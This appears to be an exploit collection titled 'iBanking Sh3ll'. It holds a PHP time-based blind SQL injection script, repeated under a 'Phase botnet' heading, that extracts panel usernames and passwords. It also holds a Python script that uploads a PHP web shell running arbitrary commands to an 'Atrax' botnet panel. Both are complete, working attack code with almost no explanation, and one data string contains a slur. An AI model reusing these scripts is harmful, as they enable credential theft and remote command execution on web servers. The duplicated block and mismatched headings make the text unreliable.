iBanking Sh3ll - HoC Article

1. shell: <?php
2. // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
3. // Start with PHP CLI (php pwn.php)
4. set_time_limit(0);
5.  
6. // Adjust this :)
7. define('SLEEP_TIME', '4');
8. define('PAGE_TIME', 4);
9. define('URL', 'http://localhost/Phase/');
10.  
11. echo('attacking ' . URL . PHP_EOL);
12.  
13. get_string('username');
14. get_string('password');
15.  
16. function get_length($field) {
17. $length = 1;
18.  
19. while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
20. ++$length;
21. }
22.  
23. echo($field . ' length: ' . $length . PHP_EOL);
24.  
25. return $length;
26. }
27.  
28. function get_string($field) {
29. $length = get_length($field);
30. $str = '';
31.  
32. for ($i = 0; $i < $length; ++$i) {
33. $str .= chr(get_char($field, $i));
34. echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
35. }
36.  
37. return $str;
38. }
39.  
40. function get_char($field, $id) {
41. $binary = '';
42.  
43. for ($i = 1; $i < 256; $i *= 2) {
44. if ($i == 128)
45. $binary = '0' . $binary;
46. else
47. $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
48. }
49.  
50. return bindec($binary);
51. }
52.  
53. function is_true($query) {
54. $rc4_key = 'aaaa'; // b d u
55. $data = 'u=tapz&d=faggot&b=lol';
56. $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
57. $encode = $rc4_key . $encode;
58. $injection = urlencode($query);
59. $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
60.  
61. return !($req['time'] < PAGE_TIME);
62. }
63.  
64. function post_request($url, $data) {
65. $handle = curl_init($url);
66.  
67. curl_setopt($handle, CURLOPT_HEADER, false);
68. curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
69. curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
70. curl_setopt($handle, CURLOPT_POST, true);
71. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
72. curl_setopt($handle, CURLOPT_TIMEOUT, 30);
73.  
74. $time = microtime(true);
75. $page = curl_exec($handle);
76. $time = microtime(true) - $time;
77.  
78. curl_close($handle);
79.  
80. return array(
81. 'page' => $page,
82. 'time' => $time
83. );
84. }
85.  
86. function rc4($pwd, $data, $data_length, $pwd_length){
87. $key[] = '';
88. $box[] = '';
89. $cipher = '';
90.  
91. for ($i = 0; $i < 256; $i++)
92. {
93. $key[$i] = ord($pwd[$i % $pwd_length]);
94. $box[$i] = $i;
95. }
96. for ($j = $i = 0; $i < 256; $i++)
97. {
98. $j = ($j + $box[$i] + $key[$i]) % 256;
99. $tmp = $box[$i];
100. $box[$i] = $box[$j];
101. $box[$j] = $tmp;
102. }
103. for ($a = $j = $i = 0; $i < $data_length; $i++)
104. {
105. $a = ($a + 1) % 256;
106. $j = ($j + $box[$a]) % 256;
107. $tmp = $box[$a];
108. $box[$a] = $box[$j];
109. $box[$j] = $tmp;
110. $k = $box[(($box[$a] + $box[$j]) % 256)];
111. $cipher .= chr(ord($data[$i]) ^ $k);
112. }
113. return $cipher;
114. }
115.  
116. creds to: Xytilol
117.  
118. Atrax botnet
119. ==============
120.  
121. Type: Shell Upload
122.  
123. Shell: #!/usr/bin/python
124.  
125. import random
126. import string
127. import base64
128. import urllib
129. import urllib2
130.  
131. # <CONFIG>
132. payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
133. url = 'http://localhost/atrax/'
134. # </CONFIG>
135.  
136. BOT_MODE_INSERT = 'b' # BOT MODE
137. BOT_MODE_RUNPLUGIN = 'e'
138. GET_PARAM_MODE = 'a' # GET PARAM
139. POST_PARAM_GUID = 'h' # POST PARAM
140. POST_PARAM_IP = 'i'
141. POST_PARAM_BUILDID = 'j'
142. POST_PARAM_PC = 'k'
143. POST_PARAM_OS = 'l'
144. POST_PARAM_ADMIN = 'm'
145. POST_PARAM_CPU = 'n'
146. POST_PARAM_GPU = 'o'
147. POST_PARAM_PLUGINNAME = 'q'
148.  
149. def request(url, get, post):
150. if not get == '':
151. url += '?' + get
152. encoded = {}
153. if not post == '':
154. for _ in post.split('&'):
155. data = _.split('=')
156. encoded[data[0]] = data[1]
157. encoded = urllib.urlencode(encoded)
158. request = urllib2.Request(url, encoded)
159. response = urllib2.urlopen(request)
160. page = response.read()
161. return page
162.  
163. def queryValue(key, value, next=True):
164. ret = key + '=' + value
165. if next:
166. ret += '&'
167. return ret
168.  
169. def randomString(length = 8):
170. return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
171.  
172. def createVictim(url, guid, ip):
173. get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
174. post = queryValue(POST_PARAM_GUID, guid)
175. post += queryValue(POST_PARAM_IP, ip)
176. post += queryValue(POST_PARAM_BUILDID, randomString())
177. post += queryValue(POST_PARAM_PC, randomString())
178. post += queryValue(POST_PARAM_OS, randomString())
179. post += queryValue(POST_PARAM_ADMIN, 'yes')
180. post += queryValue(POST_PARAM_CPU, randomString())
181. post += queryValue(POST_PARAM_GPU, randomString(), False)
182. return request(url + 'auth.php', get, post)
183.  
184. def exploit(url, guid, ip, file, payload):
185. get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
186. post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
187. post += queryValue(POST_PARAM_GUID, guid)
188. post += queryValue(POST_PARAM_IP, ip)
189. post += queryValue('am', randomString())
190. post += queryValue('ad', file)
191. post += queryValue('ab', base64.b64encode(payload))
192. post += queryValue('ai', '18', False)
193. request(url + 'auth.php', get, post)
194.  
195. def testExploit(url, guid, ip):
196. file = randomString() + '.php'
197. payload = '<?php echo("1337"); ?>'
198. exploit(url, guid, ip, file, payload)
199. return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
200.  
201. guid = '7461707a7461707a7461707a7461707a'
202. ip = '91.224.13.103'
203. file = randomString() + '.php'
204. if createVictim(url, guid, ip).strip() == 'STOP':
205. print '[-] Cannot create victim...'
206. else:
207. print '[~] Victim created/updated...'
208. if testExploit(url, guid, ip):
209. exploit(url, guid, ip, file, payload)
210. print '[+] Exploit uploaded!'
211. print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
212. else:
213. print '[-] Cannot upload payload, maybe the plugin is not actived?'
214.  
215.  
216. Phase botnet
217. ===============
218.  
219. Type: blind SQLi
220.  
221. Vuln: <?php
222. // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
223. // Start with PHP CLI (php pwn.php)
224. set_time_limit(0);
225.  
226. // Adjust this :)
227. define('SLEEP_TIME', '4');
228. define('PAGE_TIME', 4);
229. define('URL', 'http://localhost/Phase/');
230.  
231. echo('attacking ' . URL . PHP_EOL);
232.  
233. get_string('username');
234. get_string('password');
235.  
236. function get_length($field) {
237. $length = 1;
238.  
239. while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
240. ++$length;
241. }
242.  
243. echo($field . ' length: ' . $length . PHP_EOL);
244.  
245. return $length;
246. }
247.  
248. function get_string($field) {
249. $length = get_length($field);
250. $str = '';
251.  
252. for ($i = 0; $i < $length; ++$i) {
253. $str .= chr(get_char($field, $i));
254. echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
255. }
256.  
257. return $str;
258. }
259.  
260. function get_char($field, $id) {
261. $binary = '';
262.  
263. for ($i = 1; $i < 256; $i *= 2) {
264. if ($i == 128)
265. $binary = '0' . $binary;
266. else
267. $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
268. }
269.  
270. return bindec($binary);
271. }
272.  
273. function is_true($query) {
274. $rc4_key = 'aaaa'; // b d u
275. $data = 'u=tapz&d=faggot&b=lol';
276. $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
277. $encode = $rc4_key . $encode;
278. $injection = urlencode($query);
279. $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
280.  
281. return !($req['time'] < PAGE_TIME);
282. }
283.  
284. function post_request($url, $data) {
285. $handle = curl_init($url);
286.  
287. curl_setopt($handle, CURLOPT_HEADER, false);
288. curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
289. curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
290. curl_setopt($handle, CURLOPT_POST, true);
291. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
292. curl_setopt($handle, CURLOPT_TIMEOUT, 30);
293.  
294. $time = microtime(true);
295. $page = curl_exec($handle);
296. $time = microtime(true) - $time;
297.  
298. curl_close($handle);
299.  
300. return array(
301. 'page' => $page,
302. 'time' => $time
303. );
304. }
305.  
306. function rc4($pwd, $data, $data_length, $pwd_length){
307. $key[] = '';
308. $box[] = '';
309. $cipher = '';
310.  
311. for ($i = 0; $i < 256; $i++)
312. {
313. $key[$i] = ord($pwd[$i % $pwd_length]);
314. $box[$i] = $i;
315. }
316. for ($j = $i = 0; $i < 256; $i++)
317. {
318. $j = ($j + $box[$i] + $key[$i]) % 256;
319. $tmp = $box[$i];
320. $box[$i] = $box[$j];
321. $box[$j] = $tmp;
322. }
323. for ($a = $j = $i = 0; $i < $data_length; $i++)
324. {
325. $a = ($a + 1) % 256;
326. $j = ($j + $box[$a]) % 256;
327. $tmp = $box[$a];
328. $box[$a] = $box[$j];
329. $box[$j] = $tmp;
330. $k = $box[(($box[$a] + $box[$j]) % 256)];
331. $cipher .= chr(ord($data[$i]) ^ $k);
332. }
333. return $cipher;
334. }